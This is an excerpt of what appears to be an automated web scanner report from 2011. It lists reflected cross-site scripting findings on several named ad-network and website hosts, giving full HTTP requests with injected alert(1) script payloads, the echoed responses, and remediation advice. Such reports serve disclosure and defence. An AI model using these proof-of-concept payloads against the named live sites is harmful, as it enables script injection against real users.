Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=53688'%3balert(1)//72d940fd171 HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US Connection: keep-alive Proxy-Connection: keep-alive
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 514e5"%3balert(1)//00a4ac78bc5 was submitted in the mpvc parameter. This input was echoed as 514e5";alert(1)//00a4ac78bc5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/16228/131652/Lumension_IWL_728x90_A01.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16228-131652-26209-0%3Fmpt%3D7820111112&mpt=7820111112&mpvc=514e5"%3balert(1)//00a4ac78bc5 HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US Connection: keep-alive Proxy-Connection: keep-alive
The value of the mpck request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb2b6"><script>alert(1)</script>0af112df9e8 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 207be"-alert(1)-"0ae888ebe0c was submitted in the mpck parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f28a'%3balert(1)//a5f5124cb44 was submitted in the mpck parameter. This input was echoed as 2f28a';alert(1)//a5f5124cb44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 498af"><script>alert(1)</script>583203e11e9 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 581b5"%3balert(1)//e9ef16281a8 was submitted in the mpvc parameter. This input was echoed as 581b5";alert(1)//e9ef16281a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8975'%3balert(1)//e027d6e1284 was submitted in the mpvc parameter. This input was echoed as a8975';alert(1)//e027d6e1284 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the imp_rvr_id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f26a5%3balert(1)//3183a6afcbc was submitted in the imp_rvr_id parameter. This input was echoed as f26a5;alert(1)//3183a6afcbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck252455582138f26a5;alert(1)//3183a6afcbc\">" ); var rvr_id=252455582138f26a5;alert(1)//3183a6afcbc; var mpserv; var mpi="img-cdn.mediaplex.com/0/"; var mpcrgif="711/131750/83635_US_2011_Q3_Pattern_Default_300x250.jpg"; var mpck="rover. ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50b78"%3balert(1)//0f2f4574bc1 was submitted in the imp_rvr_id parameter. This input was echoed as 50b78";alert(1)//0f2f4574bc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1ef8"%3balert(1)//edfbf2e626c was submitted in the mpck parameter. This input was echoed as e1ef8";alert(1)//edfbf2e626c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck252455582138\">" ); var rvr_id=252455582138; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... &adid=344372&fcid=344362&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138&imp_rvr_id=252455582138e1ef8";alert(1)//edfbf2e626c"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76f98"%3balert(1)//48ee27f9502 was submitted in the mpvc parameter. This input was echoed as 76f98";alert(1)//48ee27f9502 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write( " <div id=\"foldcheck252455582138\">" ); var rvr_id=252455582138; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... QEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEfhAAAQUCAQIAAAAACyUIjgAAAAA./cnd=!7wRZKAjXiAQQtNchGMnCBCAA/referrer=http%3A%2F%2Fweather.uk.msn.com/clickenc=76f98";alert(1)//48ee27f9502"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3Fq6qqqqrK8z-rqqqqqsrzPwAAAKCZmQFAmpmZmZmZAUCamZmZmZkBQEdD1vc5y9wC-HCZRD1jHzEqQTlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQ ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b14b%3balert(1)//5a1cc938cb5 was submitted in the imp_rvr_id parameter. This input was echoed as 2b14b;alert(1)//5a1cc938cb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=2524564911902b14b%3balert(1)//5a1cc938cb5&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
document.write( " <div id=\"foldcheck2524564911902b14b;alert(1)//5a1cc938cb5\">" ); var rvr_id=2524564911902b14b;alert(1)//5a1cc938cb5; var mpserv; var mpi="img-cdn.mediaplex.com/0/"; var mpcrgif="711/131750/83823_US_2011_Q3_BTS_300x250.jpg"; var mpck="rover.ebay.com/rov ...[SNIP]...
The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdb86"%3balert(1)//a9fa3264758 was submitted in the imp_rvr_id parameter. This input was echoed as bdb86";alert(1)//a9fa3264758 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190bdb86"%3balert(1)//a9fa3264758&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11fd"%3balert(1)//a07e3cbe07d was submitted in the mpck parameter. This input was echoed as e11fd";alert(1)//a07e3cbe07d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190e11fd"%3balert(1)//a07e3cbe07d&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
document.write( " <div id=\"foldcheck252456491190\">" ); var rvr_id=252456491190; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... r_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190e11fd";alert(1)//a07e3cbe07d"; var mpcke="<mpcke/> ...[SNIP]...
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 708c2"%3balert(1)//0158e76f8ed was submitted in the mpvc parameter. This input was echoed as 708c2";alert(1)//0158e76f8ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/711/131750/83823_US_2011_Q3_BTS_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-25707-20%2F4%3Fsiteid%3D0%26mpt%3D1312375856%26Perf_Tracker_1%3D-1%26Perf_Tracker_2%3D526736%26Perf_Tracker_3%3D1.441240%26Perf_Tracker_4%3D0%26Perf_Tracker_5%3Du%26ext_id%3D4452179138624526041%26Perf_Tracker_6%3D7%26Perf_Tracker_7%3D1264%26Perf_Tracker_8%3D0%26Perf_Tracker_10%3D66647%26Perf_Tracker_9%3Dhttp%253A%252F%252Fweather.uk.msn.com%26adid%3D344372%26fcid%3D344362%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fb2381d1310a0aa178150b1ff970218501a77a7%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D252456491190%26imp_rvr_id%3D252456491190&siteid=0&mpt=1312375856&Perf_Tracker_1=-1&Perf_Tracker_2=526736&Perf_Tracker_3=1.441240&Perf_Tracker_4=0&Perf_Tracker_5=u&ext_id=4452179138624526041&Perf_Tracker_6=7&Perf_Tracker_7=1264&Perf_Tracker_8=0&Perf_Tracker_10=66647&Perf_Tracker_9=http%3A%2F%2Fweather.uk.msn.com&adid=344372&fcid=344362&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=8fb2381d1310a0aa178150b1ff970218501a77a7&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252456491190&imp_rvr_id=252456491190&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA.%2Fcnd%3D%217wRZKAjXiAQQtNchGMnCBCAA%2Freferrer%3Dhttp%253A%252F%252Fweather.uk.msn.com%2Fclickenc%3D708c2"%3balert(1)//0158e76f8ed HTTP/1.1 Host: img.mediaplex.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=1377845577
document.write( " <div id=\"foldcheck252456491190\">" ); var rvr_id=252456491190; var mpserv; var mpi="img-cdn.mediaplex.com/0/";
...[SNIP]... P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQACwB-gDDWvAEPAsAAQUCAQIAAAAAPiJNSwAAAAA./cnd=!7wRZKAjXiAQQtNchGMnCBCAA/referrer=http%3A%2F%2Fweather.uk.msn.com/clickenc=708c2";alert(1)//0158e76f8ed"; var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FHf6arFEP9z8d_pqsUQ_3PwAAAKCZmQFA_yCSIccW9z__IJIhxxb3P9mWHoJWUck98i-2cBjVGG0wRDlOAAAAAJAJCAAYAQAAZAAAAAIAAAC0awgASSEBAAEAAABVU0QAR0JQ ...[SNIP]...
2.134. http://it.toolbox.com/people/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/people/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b0a'-alert(1)-'52ca6c24b5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12e54'-alert(1)-'bcc5d1849aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Content-Length: 30294 Date: Tue, 02 Aug 2011 11:19:40 GMT X-Varnish: 1397465601 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS Cache-Control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> User Not Fo ...[SNIP]... <script>$.get('/api/t/2/rt/?u=http%3a%2f%2fit.toolbox.com%2fpeople%2ftypewriter12e54'-alert(1)-'bcc5d1849aa%2f&r='+document.referrer);</script> ...[SNIP]...
2.136. http://it.toolbox.com/people/typewriter/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.toolbox.com
Path:
/people/typewriter/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd3e6'-alert(1)-'36af26b13a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 64e49<script>alert(1)</script>2f37d82aa30 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS64e49<script>alert(1)</script>2f37d82aa30&num=5&layt=560x350&fmt=simp HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://networking.ittoolbox.com/groups/technical-functional/vpn-l/?cid=30913571 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Connection: close Date: Tue, 02 Aug 2011 11:16:06 GMT Pragma: no-cache Content-Type: application/x-javascript Expires: Tue, 02 Aug 2011 11:16:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 82
// Error: Unknown old section TOOLBOX_ROS64e49<script>alert(1)</script>2f37d82aa30
2.138. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jlinks.industrybrains.com
Path:
/jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 61a70<script>alert(1)</script>4a502281a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=940&ct=TOOLBOX_ROS&num=5&layt=560x350&fmt=simp&61a70<script>alert(1)</script>4a502281a35=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://networking.ittoolbox.com/groups/technical-functional/vpn-l/?cid=30913571 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: no-cache, max-age=0, must-revalidate Connection: close Date: Tue, 02 Aug 2011 11:16:07 GMT Pragma: no-cache Content-Type: application/x-javascript Expires: Tue, 02 Aug 2011 11:16:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 69
The value of the ;c request parameter is copied into the HTML document as plain text between tags. The payload 610ff<script>alert(1)</script>fb144f72136 was submitted in the ;c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.140. http://mfa.unilever.predicta.net/mrm-ad/ad/script/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mfa.unilever.predicta.net
Path:
/mrm-ad/ad/script/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 694c7<script>alert(1)</script>20f6d3d94c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7d4a2<script>alert(1)</script>4b6bb94e076 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loc/locWrite.html?callback=json17d4a2<script>alert(1)</script>4b6bb94e076&ul=http%3A%2F%2Fmsn.buscape.com.br%2F&tt=MSN%20Shopping&re=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&us=502312310620110803131826&pa=3627&pd=BP&tm=1920x1200&cr=16-bit HTTP/1.1 Host: o.lomadee.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://msn.buscape.com.br/
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload eeafe<img%20src%3da%20onerror%3dalert(1)>f3c04e68bbd was submitted in the msessionkey parameter. This input was echoed as eeafe<img src=a onerror=alert(1)>f3c04e68bbd in the application's response.
